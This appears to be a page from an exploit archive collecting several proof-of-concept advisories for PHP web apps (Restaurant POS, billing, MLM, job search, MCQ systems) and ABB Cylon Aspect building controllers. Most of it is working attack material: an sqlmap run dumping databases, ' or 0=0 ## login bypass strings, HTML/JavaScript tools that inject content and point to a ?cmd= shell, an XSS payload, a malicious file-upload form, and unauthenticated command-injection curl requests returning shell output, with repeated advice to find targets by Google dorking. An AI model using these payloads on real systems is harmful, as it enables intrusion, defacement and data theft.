Restaurant POS version 1.0 suffers from a remote SQL injection vulnerability.

    =============================================================================================================================================| # Title     : Restaurant POS v1.0 SQL injection Vulnerability                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/deletestaff.php?staffID=1[+] E:\sqlmap>python sqlmap.py -u http://127.0.0.1/bangresto-main/admin/deletestaff.php?staffID=1 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs[+] ---   GET parameter 'staffID' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N   sqlmap identified the following injection point(s) with a total of 1823 HTTP(s) requests:---  Parameter: staffID (GET)    Type: error-based    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)    Payload: staffID=1 AND EXTRACTVALUE(5264,CONCAT(0x5c,0x71787a7171,(SELECT (ELT(5264=5264,1))),0x7162787071))    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: staffID=1 AND (SELECT 3481 FROM (SELECT(SLEEP(5)))frXm)---[22:32:22] [INFO] the back-end DBMS is MySQLweb application technology: PHP 8.0.30, Apache 2.4.58, PHPback-end DBMS: MySQL >= 5.1 (MariaDB fork)[22:32:22] [INFO] fetching database names[22:32:22] [INFO] starting 7 threads[22:32:22] [INFO] retrieved: 'bangresto'[22:32:22] [INFO] retrieved: 'cms'[22:32:22] [INFO] retrieved: 'phpmyadmin'[22:32:22] [INFO] retrieved: 'mysql'[22:32:22] [INFO] retrieved: 'test'[22:32:22] [INFO] retrieved: 'information_schema'[22:32:22] [INFO] retrieved: 'performance_schema'available databases [7]:[*] bangresto[*] ending @ 22:32:22 /2024-08-16/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Restaurant POS 1.0 SQL Injection

Responsive Binary mlm version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Responsive Binary mlm 3.2.0 Auth By PAss Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202312/kashipara.com_responsive-binary-mlm-zip.zip   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : u&p = ' or 0=0 ##[+] http://127.0.0.1/responsive_binary_mlm/admin/admin_dashboard.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Responsive Binary mlm 3.2.0 SQL Injection

Responsive Billing sw System version 3.2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : Responsive Billing sw System 3.2.0 auth by pass Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202311/kashipara.com_responsive-billing-sw-zip.zip            |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] http://127.0.0.1/responsive_billing_sw/index.phpGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Responsive Billing sw System 3.2.0 SQL Injection

PHP SPM version 1.0 suffers from a WYSIWYG code injection vulnerability.

=============================================================================================================================================  
| # Title     : php spm 1.0 WYSIWYG code injection vulnerability                                                                            |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |  
=============================================================================================================================================

poc :

[+] This payload injects code of your choice into the welcome page or about via TinyMCE is a WYSIWYG editor V: 7.3.0 which is called inside the file /php-spms/classes/Master.php . 

   [+] Line 86 :  Set your Target.

[+] Line 27 :  set your payload.  <textarea name="page[welcome] ===> You can type welcome or about.

[+] save payload as poc.html

[+] payload : 

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title>Welcome Page Editor</title>  
    <script src="https://cdn.tiny.cloud/1/dsrqgwhljvccmtuu414smiyefdarsp88j5fxk0uks60iek04/tinymce/7/tinymce.min.js" referrerpolicy="origin"></script>  
</head>  
<body>  
    <main id="main" class="main">  
        <div class="pagetitle">  
          <h1>Welcome Page</h1>  
          <nav>  
              <ol class="breadcrumb">

                             <li class="breadcrumb-item active">Welcome Page</li>  
              </ol>  
          </nav>  
        </div>

        <div id="msg-container"></div>

                <div class="card rounded-0">  
          <div class="card-body rounded-0 pt-4">  
            <div class="container-fluid">  
              <form id="page-form">  
                <textarea name="page[welcome]" cols="30" rows="10" class="form-control tinymce-editor" required>Hacked By indoushka ;</textarea>  
              </form>  
            </div>  
          </div>  
          <div class="card-footer">  
            <div class="col-lg-4 col-md-5 col-sm-10 col-12 mx-auto">  
              <button class="btn btn-block w-100 btn-primary" form="page-form">Update</button>  
            </div>  
          </div>  
        </div>

        <div id="loader" style="display:none;">Loading...</div>  
        <div id="toast"></div>

        <script>  
            // Initialize TinyMCE  
            tinymce.init({  
                selector: 'textarea.tinymce-editor',  
                height: 300,  
                menubar: false,  
                plugins: [  
                  'advlist autolink lists link image charmap print preview anchor',  
                  'searchreplace visualblocks code fullscreen',  
                  'insertdatetime media table paste code help wordcount'  
                ],  
                toolbar: 'undo redo | formatselect | bold italic backcolor | ' +  
                         'alignleft aligncenter alignright alignjustify | ' +  
                         'bullist numlist outdent indent | removeformat | help'  
            });

            // Loader functions  
            function start_loader() {  
                document.getElementById('loader').style.display = 'block';  
            }

            function end_loader() {  
                document.getElementById('loader').style.display = 'none';  
            }

            // Toast function  
            function showMessage(message, type) {  
                const messageDiv = document.getElementById('toast');  
                messageDiv.innerHTML = `<div class="alert alert-${type}">${message}</div>`;  
                setTimeout(() =>        {  
                    messageDiv.innerHTML = '';  
                }, 3000);  
            }

            // Form submit event listener  
            document.getElementById('page-form').addEventListener('submit', function(e) {  
                e.preventDefault(); // Prevent page reload

                // Start loader  
                start_loader();

                const formData = new FormData(this); // Get form data  
                const xhr = new XMLHttpRequest(); // Create new XMLHttpRequest object

                // Set up request  
                xhr.open('POST', 'http://localhost/php-spms/classes/Master.php?f=save_page', true);

                // Handle response  
                xhr.onreadystatechange = function() {  
                    if (xhr.readyState === XMLHttpRequest.DONE) {  
                        end_loader();  
                        if (xhr.status === 200) {  
                            const response = JSON.parse(xhr.responseText);  
                            if (response.status === 'success') {  
                                showMessage('Page updated successfully!', 'success');  
                                location.reload(); // Reload the page if successful  
                            } else if (response.status === 'failed' && response.msg) {  
                                showMessage(response.msg, 'error');  
                            } else {  
                                showMessage('An unknown error occurred.', 'error');  
                            }  
                        } else {  
                            showMessage('Error: ' + xhr.statusText, 'error');  
                        }  
                    }  
                };

                // Send the request  
                xhr.send(formData);  
            });  
        </script>  
    </main>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP SPM 1.0 WYSIWYG Code Injection

The ABB BMS/BAS controller is operating with default and hard-coded credentials contained in install package while exposed to the Internet.

ABB Cylon Aspect 3.07.01 (config.inc.php) Hard-coded Credentials in phpMyAdmin

The ABB Cylon Aspect version 3.07.00 BMS/BAS controller suffers from an unauthenticated OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the host HTTP GET parameter called by networkDiagAjax.php script.

  
ABB Cylon Aspect 3.07.00 (networkDiagAjax.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.07.00

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from an unauthenticated OS command  
injection vulnerability. This can be exploited to inject and execute arbitrary  
shell commands through the 'host' HTTP GET parameter called by networkDiagAjax.php  
script.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic (2024) and Prism Infosec (2022)  
                            @zeroscience

Advisory ID: ZSL-2024-5829  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5829.php  
CVE ID: CVE-2023-0636  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2023-0636

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               $ curl http://192.168.73.31/networkDiagAjax.php?command=traceroute&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=nslookup&host=;id  
$ curl http://192.168.73.31/networkDiagAjax.php?command=ping&host=;id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

ABB Cylon Aspect 3.07.00 Remote Code Execution

PHP SPM version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php spm 1.0 php code injection Vulnerability                                                                                |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-spms-zip.zip                         |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP SPM 1.0 Code Injection

PHP ACRSS version 1.0 suffers from a PHP code injection vulnerability.

=============================================================================================================================================  
| # Title     : php acrss 1.0 php code injection Vulnerability                                                                              |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            |  
| # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202305/kashipara.com_php-acrss-zip.zip                        |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] This code injects the malicious code you want into existing HTML files or creates a new HTML file and injects the payload.

[+] Line 11 Set your file name & payload.

[+] save payload as poc.html

[+] payload :

<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <meta name="viewport" content="width=device-width, initial-scale=1.0">  
    <title> PHP code injection Tool</title>  
    <script>  
        async function sendRequest() {  
            const url = document.getElementById('url').value;  
            const postData = {  
                'content[welcome]': `Hacked by indoushka`  
            };

            try {  
                const response = await fetch(`${url}/classes/SystemSettings.php?f=update_settings`, {  
                    method: 'POST',  
                    headers: {  
                        'Content-Type': 'application/x-www-form-urlencoded'  
                    },  
                    body: new URLSearchParams(postData).toString()  
                });

                if (response.ok) {  
                    document.getElementById('result').innerText = '[+] Injection in welcome page\n[+] ' + url + '/?cmd=ls -al\n';

                } else {  
                    document.getElementById('result').innerText = 'Error: ' + response.statusText;  
                }  
            } catch (error) {  
                document.getElementById('result').innerText = 'Error making request: ' + error.message;  
            }  
        }  
    </script>  
</head>  
<body>  
    <h1>Injection Tool</h1>  
    <form onsubmit="event.preventDefault(); sendRequest();">  
        <label for="url">Enter URL:</label>  
        <input type="text" id="url" name="url" required>  
        <button type="submit">Submit</button>  
    </form>  
    <pre id="result"></pre>  
</body>  
</html>

Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================

PHP ACRSS 1.0 Code Injection

Online mcq System version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Online mcq System 1.0 XSS vulnerability                                                                                     || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/download/project2/user/2023/202304/kashipara.com_onlinemcq-zip.zip                        |=============================================================================================================================================[+] POC :[+] use Payload : feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback'"()%26%25<acx><ScRiPt >prompt(990455)</ScRiPt>   [+] http://127.0.0.1/onlinemcq/feedback.php?q=Thank%2520you%2520for%2520your%2520valuable%2520feedback%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(990455)%3C/ScRiPt%3EGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Online mcq System 1.0 Cross Site Scripting

Online Job Search System version 1.0 suffers from an arbitrary file upload vulnerability.

=============================================================================================================================================| # Title     : Online Job Search System 1.0 Remote File Upload Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/online-job-search-system-using-php-mysql-source-code/?wpdmdl=8545&refresh=66bbf77f15e8c1723594623       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] Go to the line 10.[+] Set the target site link Save changes and apply . [+] save code as poc.html .<!DOCTYPE html><html lang="en"><head>    <meta charset="UTF-8">    <meta name="viewport" content="width=device-width, initial-scale=1.0">    <title>Submit Application</title></head><body>    <h2>Submit Application</h2>    <form action="http://127.0.0.1/eris/process.php?action=submitapplication&JOBID=2" method="POST" enctype="multipart/form-data">                <div class="form-group">            <label for="picture">Upload your picture:</label>            <input type="file" name="picture" id="picture" required>        </div>                <div class="form-group">            <button type="submit">Submit</button>        </div>    </form></body></html>[+] path : http://127.0.0.1/eris/applicant/photosGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#php